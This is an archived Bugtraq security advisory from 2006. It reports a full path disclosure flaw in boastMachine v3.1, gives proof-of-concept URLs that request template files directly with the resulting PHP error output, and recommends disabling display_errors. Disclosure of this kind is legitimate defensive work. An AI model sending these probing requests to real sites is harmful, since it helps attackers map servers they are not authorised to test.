[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1
From: eufrato@xxxxxxxxx
Date: 5 Jan 2006 10:27:23 -0000

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_25$2006

---------------------------------------------------------------------------
         [ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1 
---------------------------------------------------------------------------

Author       : M.Hasran Addahroni
Date         : January, 5th 2006
Location     : Indonesia
Web          : http://echo.or.id/adv/adv26-K-159-2006.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BoastMachine

version    : v3.1
Vendor     : http://boastology.com
Description: boastMachine is an aplication software to built blog, support
with mysql and php

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~
In the folder /templates/default/ A remote user can access footer.php and 
side_menu.php directly to cause the system to display an error message that 
indicates the installation path. The resulting error message will disclose 
potentially sensitive installation path information to the remote attacker

    
Proof of Concept:
~~~~~~~~
 (i) http://victim/[boastMachine_path]/templates/default/side_menu.php 
  
  http://localhost/blog/templates/default/side_menu.php

  Warning: Failed opening 'CFG_ROOT/calendar.php' for inclusion  
(include_path='.:/usr/lib/php') in 
 /var/www/html/blog/templates/default/side_menu.php on line 3

  Fatal error: Call to undefined function: bmc_show_list() in 
  /var/www/html/blog/templates/default/side_menu.php  on line 10

  
 (ii) http://victim/[boastMachine_path]/templates/default/footer.php
   
   http://localhost/blog/templates/default/footer.php

   Warning: Failed opening 'CFG_ROOT/reflog.php' for inclusion 
(include_path='.:/usr/lib/php') in
  /var/www/html/blog/templates/default/footer.php on line 20

   Warning: Failed opening 'CFG_ROOT/users_online.php' for inclusion 
(include_path='.:/usr/lib/php') in 
  /var/www/html/blog/templates/default/footer.php on line 23

Solution:
~~~~~~~~~
For User and do not know how to fix the script , change php.ini file setting 
then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, the_day, c-a-s-e, S`to, lirva32, anonymous
~ masterpop3, biatch-x, bithedz, Lieur-Euy, mr_Ny3m, maSter-oP, stev, sinChan, 
cowok_1seng, x`shell, m_beben, etc
~ newbie_hacker@xxxxxxxxxxxxxxx 
~ #e-c-h-o, #aikmel @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Prev by Date: MD:Pro - Malware Distribution Project
Next by Date: RE: Dumb IE6/XP denial of service found on the web
Previous by thread: Re: MD:Pro - Malware Distribution Project
Next by thread: CyberShop User Login Sql Injection
Index(es):
- Date
- Thread